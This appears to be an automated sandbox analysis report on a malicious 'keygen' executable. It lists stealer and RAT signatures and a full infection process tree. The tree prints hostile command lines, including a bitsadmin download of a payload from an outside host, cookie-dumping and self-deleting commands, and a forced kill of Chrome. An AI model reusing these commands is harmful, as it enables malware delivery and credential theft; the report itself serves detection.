Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    161s
  • max time network
    302s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 05:23

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 47 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:932
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1288
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2752
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2384
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2360
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2332
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2272
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1892
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1356
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1196
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4024
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2164
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2844
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3964
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4364
                        • C:\Users\Admin\AppData\Local\Temp\is-RTOUI.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-RTOUI.tmp\Install.tmp" /SL5="$4007E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4400
                          • C:\Users\Admin\AppData\Local\Temp\is-NQTDJ.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-NQTDJ.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4504
                            • C:\Program Files\Internet Explorer\UGHJRKDSJJ\ultramediaburner.exe
                              "C:\Program Files\Internet Explorer\UGHJRKDSJJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4656
                              • C:\Users\Admin\AppData\Local\Temp\is-9L2AT.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-9L2AT.tmp\ultramediaburner.tmp" /SL5="$30164,281924,62464,C:\Program Files\Internet Explorer\UGHJRKDSJJ\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4688
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4776
                            • C:\Users\Admin\AppData\Local\Temp\da-9df13-0cd-f6089-f14733e3ac2f9\Vividesafu.exe
                              "C:\Users\Admin\AppData\Local\Temp\da-9df13-0cd-f6089-f14733e3ac2f9\Vividesafu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4816
                            • C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Duhapyveby.exe
                              "C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Duhapyveby.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4872
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylcxwnm0.5c3\sskiper.exe /s & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5164
                                • C:\Users\Admin\AppData\Local\Temp\ylcxwnm0.5c3\sskiper.exe
                                  C:\Users\Admin\AppData\Local\Temp\ylcxwnm0.5c3\sskiper.exe /s
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5388
                                  • C:\Users\Admin\AppData\Local\Temp\1964142196.exe
                                    C:\Users\Admin\AppData\Local\Temp\1964142196.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4140
                                  • C:\Users\Admin\AppData\Local\Temp\1410874504.exe
                                    C:\Users\Admin\AppData\Local\Temp\1410874504.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5456
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\ylcxwnm0.5c3\sskiper.exe & exit
                                    8⤵
                                      PID:728
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 0
                                        9⤵
                                        • Runs ping.exe
                                        PID:5492
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\biew1rqd.qeh\KiffMainE1.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5532
                                  • C:\Users\Admin\AppData\Local\Temp\biew1rqd.qeh\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\biew1rqd.qeh\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5660
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tovafrti.j2c\001.exe & exit
                                  6⤵
                                    PID:5772
                                    • C:\Users\Admin\AppData\Local\Temp\tovafrti.j2c\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\tovafrti.j2c\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5884
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ld1vb4yw.q5f\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:1864
                                      • C:\Users\Admin\AppData\Local\Temp\ld1vb4yw.q5f\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\ld1vb4yw.q5f\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5320
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ld1vb4yw.q5f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ld1vb4yw.q5f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619846336 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:4652
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybt1zogv.vza\gpooe.exe & exit
                                        6⤵
                                          PID:5312
                                          • C:\Users\Admin\AppData\Local\Temp\ybt1zogv.vza\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\ybt1zogv.vza\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5976
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4696
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:1736
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\craxg2jq.qoy\google-game.exe & exit
                                          6⤵
                                            PID:2844
                                            • C:\Users\Admin\AppData\Local\Temp\craxg2jq.qoy\google-game.exe
                                              C:\Users\Admin\AppData\Local\Temp\craxg2jq.qoy\google-game.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2184
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                8⤵
                                                • Loads dropped DLL
                                                PID:5596
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rrib0rgf.cjd\y1.exe & exit
                                            6⤵
                                              PID:4280
                                              • C:\Users\Admin\AppData\Local\Temp\rrib0rgf.cjd\y1.exe
                                                C:\Users\Admin\AppData\Local\Temp\rrib0rgf.cjd\y1.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:5524
                                                • C:\Users\Admin\AppData\Local\Temp\WudunR5HkW.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\WudunR5HkW.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:6760
                                                  • C:\Users\Admin\AppData\Roaming\1620105660488.exe
                                                    "C:\Users\Admin\AppData\Roaming\1620105660488.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620105660488.txt"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:5764
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\WudunR5HkW.exe"
                                                    9⤵
                                                      PID:6480
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 127.0.0.1 -n 3
                                                        10⤵
                                                        • Runs ping.exe
                                                        PID:6804
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rrib0rgf.cjd\y1.exe"
                                                    8⤵
                                                      PID:6980
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        9⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5920
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dsto3u3o.c04\askinstall39.exe & exit
                                                  6⤵
                                                    PID:5620
                                                    • C:\Users\Admin\AppData\Local\Temp\dsto3u3o.c04\askinstall39.exe
                                                      C:\Users\Admin\AppData\Local\Temp\dsto3u3o.c04\askinstall39.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5576
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                        8⤵
                                                          PID:7088
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im chrome.exe
                                                            9⤵
                                                            • Kills process with taskkill
                                                            PID:6364
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\routyntr.2pl\setup.exe & exit
                                                      6⤵
                                                        PID:1148
                                                        • C:\Users\Admin\AppData\Local\Temp\routyntr.2pl\setup.exe
                                                          C:\Users\Admin\AppData\Local\Temp\routyntr.2pl\setup.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:6204
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sj5fthds.pe3\SunLabsPlayer.exe /S & exit
                                                        6⤵
                                                          PID:6212
                                                          • C:\Users\Admin\AppData\Local\Temp\sj5fthds.pe3\SunLabsPlayer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\sj5fthds.pe3\SunLabsPlayer.exe /S
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            PID:6372
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:6856
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5860
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5936
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1212
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5880
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:6860
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Checks for any installed AV software in registry
                                                                          PID:5196
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                          8⤵
                                                                          • Download via BitsAdmin
                                                                          PID:4052
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pm6vEf0V1jawU56m -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:6516
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                            PID:6432
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4840
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:6932
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5228
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:3832
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5492
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                      8⤵
                                                                                        PID:1348
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                          9⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in System32 directory
                                                                                          • Drops file in Program Files directory
                                                                                          PID:1824
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4712
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:4468
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:6480
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6456
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshBF6F.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5540
                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1348
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mbrwsdhs.uv5\005.exe & exit
                                                                                              6⤵
                                                                                                PID:6412
                                                                                                • C:\Users\Admin\AppData\Local\Temp\mbrwsdhs.uv5\005.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\mbrwsdhs.uv5\005.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6536
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwtoizwr.12e\ifhwwyy.exe & exit
                                                                                                6⤵
                                                                                                  PID:6560
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xwtoizwr.12e\ifhwwyy.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\xwtoizwr.12e\ifhwwyy.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6604
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6692
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:7008
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dud3qsnh.yk5\toolspab1.exe & exit
                                                                                                  6⤵
                                                                                                    PID:6752
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\dud3qsnh.yk5\toolspab1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\dud3qsnh.yk5\toolspab1.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:6816
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\dud3qsnh.yk5\toolspab1.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\dud3qsnh.yk5\toolspab1.exe
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:6928
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4992
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                              3⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5380
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:5568
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:4380
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:5944
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2340
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4912
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies data under HKEY_USERS
